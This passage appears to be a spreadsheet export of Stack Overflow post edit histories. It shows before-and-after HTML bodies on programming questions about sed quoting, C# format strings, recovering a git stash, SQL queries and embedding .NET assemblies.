    SIZE_T retSize = VirtualQuery((void *)addr,&amp;amp;buffer,sizeof(buffer));_x000D_
    if (retSize==sizeof(buffer) &amp;amp;&amp;amp; buffer.RegionSize&amp;gt;0)_x000D_
    {_x000D_
      // dump information about this region_x000D_
      printf(.... some buffer information here ....);_x000D_
      // track longest feee region - usefull fragmentation indicator_x000D_
      if (buffer.State&amp;amp;MEM_FREE)_x000D_
      {_x000D_
        if (buffer.RegionSize&amp;gt;longestFreeApp) longestFreeApp = buffer.RegionSize;_x000D_
      }_x000D_
      addr += buffer.RegionSize;_x000D_
      index+= buffer.RegionSize/pageSize;_x000D_
    }_x000D_
    else_x000D_
    {_x000D_
      // always proceed_x000D_
      addr += pageSize;_x000D_
      index++;_x000D_
    }_x000D_
  }_x000D_
  printf("Longest free VM region: %d",longestFreeApp);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How to match a single quote in sed if the expression is enclosed in single quotes:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;sed -e '...'_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; For example need to match&lt;span class="diff-delete"&gt; this&lt;/span&gt; this text:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;'foo'_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How to match a single quote in sed if the expression is enclosed in single quotes:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;sed -e '...'_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; For example need to match this text:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;'foo'_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>tzot</t>
  </si>
  <si>
    <t>TimB</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How can brackets be escaped in a C# format string so, something like :&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;String val = &lt;span class="hljs-string"&gt;"1,2,3"&lt;/span&gt;_x000D_
String.Format(&lt;span class="diff-delete"&gt;&lt;span class="hljs-string"&gt;"foo&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt; {{0}}"&lt;/span&gt;, val); _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; doesn't throw a parse exception but actually outputs the string &lt;code&gt;&lt;span class="diff-delete"&gt;foo {0}&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Is there a way to escape the brackets or should a workaround be used&lt;span class="diff-delete"&gt;?&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How can brackets be escaped in a C# format string so, something like :&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;String val = &lt;span class="hljs-string"&gt;"1,2,3"&lt;/span&gt;_x000D_
String.Format(&lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt;" foo&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt; {{0}}"&lt;/span&gt;, val); _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; doesn't throw a parse exception but actually outputs the string&lt;span class="diff-add"&gt; " foo&lt;/span&gt; &lt;span class="diff-add"&gt;{1,2,3}"&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Is there a way to escape the brackets or should a workaround be used&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Pop Catalin</t>
  </si>
  <si>
    <t>David Schmitt</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you have only just popped it and the terminal is still open, you will &lt;a href="http://stackoverflow.com/questions/89332/recover-dropped-stash-in-git/7844566#7844566"&gt;still have the hash value printed by &lt;code&gt;git stash pop&lt;/code&gt; on screen&lt;/a&gt; (thanks, Dolda).&lt;/p&gt; _x000D_
 &lt;p&gt; Otherwise, you can find it using this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;git fsck --no-reflog | awk '/dangling commit/ {print $3}'_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This will show you all the commits at the tips of your commit graph which are no longer referenced from any branch or tag – every lost commit, including every stash commit you’ve ever created, will be somewhere in that graph.&lt;/p&gt; _x000D_
 &lt;p&gt; The easiest way to find the stash commit you want is probably to pass that list to &lt;code&gt;gitk&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;gitk --all $( git fsck --no-reflog | awk '/dangling commit/ {print $3}' )_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This will launch a repository browser showing you &lt;em&gt;every single commit in the repository ever&lt;/em&gt;, regardless of whether it is reachable or not.&lt;/p&gt; _x000D_
 &lt;p&gt; You can replace &lt;code&gt;gitk&lt;/code&gt; there with something like &lt;code&gt;git log&lt;/code&gt; if you prefer a nice graph on the console over a separate GUI app&lt;span class="diff-delete"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;git log --graph --oneline --decorate --all $( git fsck --no-reflog | awk '/dangling commit/ {print $3}' )_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; To spot stash commits, look for commit messages of this form:&lt;/p&gt; _x000D_
 &lt;p&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; WIP on &lt;i&gt;somebranch&lt;/i&gt;: &lt;i&gt;commithash Some old commit message&lt;/i&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;Note&lt;/em&gt;: The commit message will only be in this form (starting with "WIP on") if you did not supply a message when you did &lt;code&gt;git stash&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Once you know the hash of the commit you want, you can apply it as a stash:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;git stash apply &lt;i&gt;$stash_hash&lt;/i&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Or you can use the context menu in &lt;code&gt;gitk&lt;/code&gt; to create branches for any unreachable commits you are interested in. After that, you can do whatever you want with them with all the normal tools. When you’re done, just blow those branches away again.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you have only just popped it and the terminal is still open, you will &lt;a href="http://stackoverflow.com/questions/89332/recover-dropped-stash-in-git/7844566#7844566"&gt;still have the hash value printed by &lt;code&gt;git stash pop&lt;/code&gt; on screen&lt;/a&gt; (thanks, Dolda).&lt;/p&gt; _x000D_
 &lt;p&gt; Otherwise, you can find it using this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;git fsck --no-reflog | awk '/dangling commit/ {print $3}'_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This will show you all the commits at the tips of your commit graph which are no longer referenced from any branch or tag – every lost commit, including every stash commit you’ve ever created, will be somewhere in that graph.&lt;/p&gt; _x000D_
 &lt;p&gt; The easiest way to find the stash commit you want is probably to pass that list to &lt;code&gt;gitk&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;gitk --all $( git fsck --no-reflog | awk '/dangling commit/ {print $3}' )_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This will launch a repository browser showing you &lt;em&gt;every single commit in the repository ever&lt;/em&gt;, regardless of whether it is reachable or not.&lt;/p&gt; _x000D_
 &lt;p&gt; You can replace &lt;code&gt;gitk&lt;/code&gt; there with something like &lt;code&gt;git log&lt;span class="diff-add"&gt; --graph --oneline --decorate&lt;/span&gt;&lt;/code&gt; if you prefer a nice graph on the console over a separate GUI app&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; To spot stash commits, look for commit messages of this form:&lt;/p&gt; _x000D_
 &lt;p&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; WIP on &lt;i&gt;somebranch&lt;/i&gt;: &lt;i&gt;commithash Some old commit message&lt;/i&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;Note&lt;/em&gt;: The commit message will only be in this form (starting with "WIP on") if you did not supply a message when you did &lt;code&gt;git stash&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Once you know the hash of the commit you want, you can apply it as a stash:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;git stash apply &lt;i&gt;$stash_hash&lt;/i&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Or you can use the context menu in &lt;code&gt;gitk&lt;/code&gt; to create branches for any unreachable commits you are interested in. After that, you can do whatever you want with them with all the normal tools. When you’re done, just blow those branches away again.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Aristotle Pagaltzis</t>
  </si>
  <si>
    <t>Wilfred Hughes</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Perhaps it is attaching to "the wrong kind" of code.&lt;/p&gt; _x000D_
 &lt;p&gt; In the "Attach to Process" dialog, there is a setting that allows you to select the kind of code you want to debug. Try clicking "Select" button next to "Attach to" text box and checking only &lt;s&gt;"Managed code"&lt;/s&gt; the relevant code type.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &amp;nbsp;&lt;/span&gt; _x000D_
 &lt;p&gt; Most of the time, leaving "automatically determine the type of code to debug" setting on works for me. However, in some cases, the debugger is not able to understand that I want to attach to managed code (if I have launched my application from a batch file, for example) and when it does that, the&lt;span class="diff-delete"&gt; solution&lt;/span&gt; above &lt;span class="diff-delete"&gt;cures the problem&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Perhaps it is attaching to "the wrong kind" of code.&lt;/p&gt; _x000D_
 &lt;p&gt; In the "Attach to Process" dialog, there is a setting that allows you to select the kind of code you want to debug. Try clicking "Select" button next to "Attach to" text box and checking only &lt;s&gt;"Managed code"&lt;/s&gt; the relevant code type.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;a href="http://img204.imageshack.us/img204/3017/capture5ct4.png" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://img204.imageshack.us/img204/3017/capture5ct4.png&lt;/span&gt;&lt;/a&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; Most of the time, leaving "automatically determine the type of code to debug" setting on works for me. However, in some cases, the debugger is not able to understand that I want to attach to managed code (if I have launched my application from a batch file, for example) and when it does that, the above &lt;span class="diff-add"&gt;solution works for me&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ishmaeel</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is the difference between &lt;span class="diff-delete"&gt;logical view&lt;/span&gt; and &lt;span class="diff-delete"&gt;usecase view&lt;/span&gt; in &lt;span class="diff-delete"&gt;OOMD&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is the difference between &lt;span class="diff-add"&gt;Views&lt;/span&gt; and &lt;span class="diff-add"&gt;Materialized Views&lt;/span&gt; in &lt;span class="diff-add"&gt;Oracle&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt;
            &lt;p&gt;Has anyone seen a Yahoo YUI validation framework that I could implement into asp.net MVC?  I've seen a jQuery one but I want to work wit YUI.&lt;/p&gt;
        &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Like this:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="hljs-string"&gt;"\n"&lt;/span&gt;.charCodeAt(&lt;span class="hljs-number"&gt;0&lt;/span&gt;&lt;span class="diff-delete"&gt;);_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; It is also not necessary to give the &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;0&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; index. You can simpl&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-string"&gt;"\n"&lt;/span&gt;.charCodeAt(&lt;/span&gt;);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="hljs-string"&gt;"\n"&lt;/span&gt;.charCodeAt(&lt;span class="hljs-number"&gt;0&lt;/span&gt;);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jim</t>
  </si>
  <si>
    <t>Starx</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I can never remember &lt;span class="diff-delete"&gt;it&lt;/span&gt;. &lt;span class="diff-delete"&gt;Is there&lt;/span&gt; a memory rule&lt;span class="diff-delete"&gt; or something?&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I can never remember &lt;span class="diff-add"&gt;that number&lt;/span&gt;. &lt;span class="diff-add"&gt;I need&lt;/span&gt; a memory rule&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ben Hoffstein</t>
  </si>
  <si>
    <t>Cole Johnson</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; It's &lt;a href="http://en.wikipedia.org/wiki/2147483647" rel="nofollow noreferrer"&gt;2,147,483,647&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; 2147483647 without commas.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; It's &lt;a href="http://en.wikipedia.org/wiki/2147483647" rel="nofollow noreferrer"&gt;2,147,483,647&lt;/a&gt;.&lt;span class="diff-add"&gt; Easiest way to memorize it is via a tattoo.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; 2147483647 without commas.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>WolfieeifloW</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm running a SQL query on SQL Server 2005, and in addition to 2 columns being queried from the database, I'd also like to return 1 column of random numbers along with them. I tried this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;select column1, column2, floor(rand() * 10000) as column3 from table1_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;...which kinda works, but the problem is that this query returns the same random number on every row. It's a different number each time you run the query, but it doesn't vary from row to row. How can I do this and get a new random number for each row?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;WARNING&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; The answer marked correct on this question is &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/94906/how-do-i-return-random-numbers-as-a-column-in-sql-server-2005/493703#493703"&gt;&lt;span class="diff-delete"&gt;very inefficient&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm running a SQL query on SQL Server 2005, and in addition to 2 columns being queried from the database, I'd also like to return 1 column of random numbers along with them. I tried this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;select column1, column2, floor(rand() * 10000) as column3 from table1_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;...which kinda works, but the problem is that this query returns the same random number on every row. It's a different number each time you run the query, but it doesn't vary from row to row. How can I do this and get a new random number for each row?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Joshua Carmody</t>
  </si>
  <si>
    <t>Sam Saffron</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; First limit the selection to the highest score for each account id. Then take the top ten scores.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;SELECT TOP 10 AccountId, Score_x000D_
FROM Scores s1_x000D_
WHERE &lt;span class="diff-delete"&gt;Id&lt;/span&gt; NOT IN _x000D_
    (SELECT &lt;span class="diff-delete"&gt;Id&lt;/span&gt; FROM Scores &lt;span class="diff-delete"&gt;s2&lt;/span&gt;_x000D_
     WHERE s1.AccountId = s2.AccountId and s1.Score &amp;gt; s2.Score)_x000D_
ORDER BY Score DESC_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; First limit the selection to the highest score for each account id. Then take the top ten scores.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;SELECT TOP 10 AccountId, Score_x000D_
FROM Scores s1_x000D_
WHERE &lt;span class="diff-add"&gt;AccountId&lt;/span&gt; NOT IN _x000D_
    (SELECT &lt;span class="diff-add"&gt;AccountId&lt;/span&gt; &lt;span class="diff-add"&gt;s2 &lt;/span&gt;FROM Scores _x000D_
     WHERE s1.AccountId = s2.AccountId and s1.Score &amp;gt; s2.Score)_x000D_
ORDER BY Score DESC_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How do you access the response from the Request&lt;span class="diff-delete"&gt; object&lt;/span&gt; in MooTools?&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;&amp;nbsp;&lt;/span&gt; I've been looking at the documentation and the MooTorial, but I can't seem to make any headway. Other Ajax stuff I've done with MooTools I haven't had to manipulate the response at all, so I've just been able to inject it straight into the document, but now I need to make some changes to it first.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How do you access the response from the Request&lt;span class="diff-add"&gt; object&lt;/span&gt; in MooTools? I've been looking at the documentation and the MooTorial, but I can't seem to make any headway. Other Ajax stuff I've done with MooTools I haven't had to manipulate the response at all, so I've just been able to inject it straight into the document, but now I need to make some changes to it first&lt;span class="diff-add"&gt;. I don't want to alert the response, I'd like to access it so I can make further changes to it. Any help would be greatly appreciated. Thanks.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Edit:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I'd like to be able to access the response after the request has already been made, preferably outside of the Request object. It's for an RSS reader, so I need to do some parsing and Request is just being used to get the feed from a server file&lt;/span&gt;.&lt;span class="diff-add"&gt; This function is a method in a class, which should return the response in a string, but it isn't returning anything but undefined:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;        fetch: function(site){_x000D_
                var feed;_x000D_
                var req = new Request({_x000D_
                        method: this.options.method,_x000D_
                        url: this.options.rssFetchPath,_x000D_
                        data: { 'url' : site },_x000D_
            onRequest: function() {_x000D_
                                if (this.options.targetId) { $_x000D_
(this.options.targetId).setProperty('html',_x000D_
this.options.onRequestMessage); }_x000D_
                        }.bind(this),_x000D_
                        onSuccess: function(responseText) {_x000D_
                                feed = responseText;_x000D_
                        }_x000D_
                });_x000D_
                req.send();_x000D_
                return feed;_x000D_
        } _x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jon Winstanley</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The problem is often mentioned in &lt;span class="diff-delete"&gt;object&lt;/span&gt;-&lt;span class="diff-delete"&gt;relation mapping&lt;/span&gt; discussions, and I understand that it has something do to with having to make a lot of database queries for something that seems simple in the object world.&lt;/p&gt; _x000D_
 &lt;p&gt; Does anybody have a more detailed&lt;span class="diff-delete"&gt;--&lt;/span&gt;but simple&lt;span class="diff-delete"&gt;--explanation&lt;/span&gt; of the problem?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The problem is often mentioned in &lt;span class="diff-add"&gt;O/R&lt;/span&gt;-&lt;span class="diff-add"&gt;mapping&lt;/span&gt; discussions, and I understand that it has something do to with having to make a lot of database queries for something that seems simple in the object world.&lt;/p&gt; _x000D_
 &lt;p&gt; Does anybody have a more detailed&lt;span class="diff-add"&gt; (&lt;/span&gt;but simple&lt;span class="diff-add"&gt;!) explanation&lt;/span&gt; of the problem?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Mark Amery</t>
  </si>
  <si>
    <t>Peter O.</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Once you've embedded the third-party assembly as a resource, add code to subscribe to the &lt;a href="http://msdn.microsoft.com/en-us/library/system.appdomain.assemblyresolve.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;AppDomain.AssemblyResolve&lt;/code&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; (which requires &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;using System.Reflection;&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;)&lt;/span&gt; event of the current domain during application start-up. This event fires whenever the Fusion sub-system of the CLR fails to locate an assembly according to the probing (policies) in effect. In the event handler for &lt;code&gt;AppDomain.AssemblyResolve&lt;/code&gt;, load the resource using &lt;a href="http://msdn.microsoft.com/en-us/library/system.reflection.assembly.getmanifestresourcestream.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;Assembly.GetManifestResourceStream&lt;/code&gt;&lt;/a&gt; and feed its content as a byte array into the corresponding &lt;a href="http://msdn.microsoft.com/en-us/library/h538bck7.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;Assembly.Load&lt;/code&gt;&lt;/a&gt; overload. Below is how one such implementation could look like in C#:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;AppDomain.CurrentDomain.AssemblyResolve += (sender, args) =&amp;gt;_x000D_
{_x000D_
    var resName = args.Name + ".dll";    _x000D_
    var thisAssembly = Assembly.GetExecutingAssembly();    _x000D_
    using (var input = thisAssembly.GetManifestResourceStream(resName))_x000D_
    {_x000D_
        return input != null _x000D_
             ? Assembly.Load(StreamToBytes(input))_x000D_
             : null;_x000D_
    }_x000D_
};_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; where &lt;code&gt;StreamToBytes&lt;/code&gt; could be defined as:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;static byte[] StreamToBytes(Stream input) _x000D_
{_x000D_
    var capacity = input.CanSeek ? (int) input.Length : 0;_x000D_
    using (var output = new MemoryStream(capacity))_x000D_
    {_x000D_
        int readLength;_x000D_
        var buffer = new byte[4096];_x000D_
_x000D_
        do_x000D_
        {_x000D_
            readLength = input.Read(buffer, 0, buffer.Length);_x000D_
            output.Write(buffer, 0, readLength);_x000D_
        }_x000D_
        while (readLength != 0);_x000D_
_x000D_
        return output.ToArray();_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Finally, as a few have already mentioned, &lt;a href="http://research.microsoft.com/%7Embarnett/ILMerge.aspx" rel="nofollow noreferrer"&gt;ILMerge&lt;/a&gt; may be another option to consider, albeit somewhat more involved.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Once you've embedded the third-party assembly as a resource, add code to subscribe to the &lt;a href="http://msdn.microsoft.com/en-us/library/system.appdomain.assemblyresolve.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;AppDomain.AssemblyResolve&lt;/code&gt;&lt;/a&gt; event of the current domain during application start-up. This event fires whenever the Fusion sub-system of the CLR fails to locate an assembly according to the probing (policies) in effect. In the event handler for &lt;code&gt;AppDomain.AssemblyResolve&lt;/code&gt;, load the resource using &lt;a href="http://msdn.microsoft.com/en-us/library/system.reflection.assembly.getmanifestresourcestream.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;Assembly.GetManifestResourceStream&lt;/code&gt;&lt;/a&gt; and feed its content as a byte array into the corresponding &lt;a href="http://msdn.microsoft.com/en-us/library/h538bck7.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;Assembly.Load&lt;/code&gt;&lt;/a&gt; overload. Below is how one such implementation could look like in C#:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;AppDomain.CurrentDomain.AssemblyResolve += (sender, args) =&amp;gt;_x000D_
{_x000D_
    var resName = args.Name + ".dll";    _x000D_
    var thisAssembly = Assembly.GetExecutingAssembly();    _x000D_
    using (var input = thisAssembly.GetManifestResourceStream(resName))_x000D_
    {_x000D_
        return input != null _x000D_
             ? Assembly.Load(StreamToBytes(input))_x000D_
             : null;_x000D_
    }_x000D_
};_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; where &lt;code&gt;StreamToBytes&lt;/code&gt; could be defined as:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;static byte[] StreamToBytes(Stream input) _x000D_
{_x000D_
    var capacity = input.CanSeek ? (int) input.Length : 0;_x000D_
    using (var output = new MemoryStream(capacity))_x000D_
    {_x000D_
        int readLength;_x000D_
        var buffer = new byte[4096];_x000D_
_x000D_
        do_x000D_
        {_x000D_
            readLength = input.Read(buffer, 0, buffer.Length);_x000D_
            output.Write(buffer, 0, readLength);_x000D_
        }_x000D_
        while (readLength != 0);_x000D_
_x000D_
        return output.ToArray();_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Finally, as a few have already mentioned, &lt;a href="http://research.microsoft.com/%7Embarnett/ILMerge.aspx" rel="nofollow noreferrer"&gt;ILMerge&lt;/a&gt; may be another option to consider, albeit somewhat more involved.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Atif Aziz</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; When a C# &lt;span class="diff-delete"&gt;Windows Forms&lt;/span&gt; text box receives focus, I want to select all the text in the textbox.&lt;/p&gt; _x000D_
 &lt;p&gt; To see what I mean, click in your web browser's address bar. See how all text was selected? I want to do that.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;FASTEST GUN ALERT: please read the following before answering!&lt;/strong&gt; Thanks guys&lt;span class="diff-delete"&gt;/gals&lt;/span&gt;. :-)&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Calling &lt;strong&gt;.SelectAll() during the .Enter or .GotFocus events won't work&lt;/strong&gt; because if the user clicked the textbox, the caret will be placed where he&lt;span class="diff-delete"&gt;/she&lt;/span&gt; clicked, thus deselecting all text.&lt;/p&gt; _x000D_
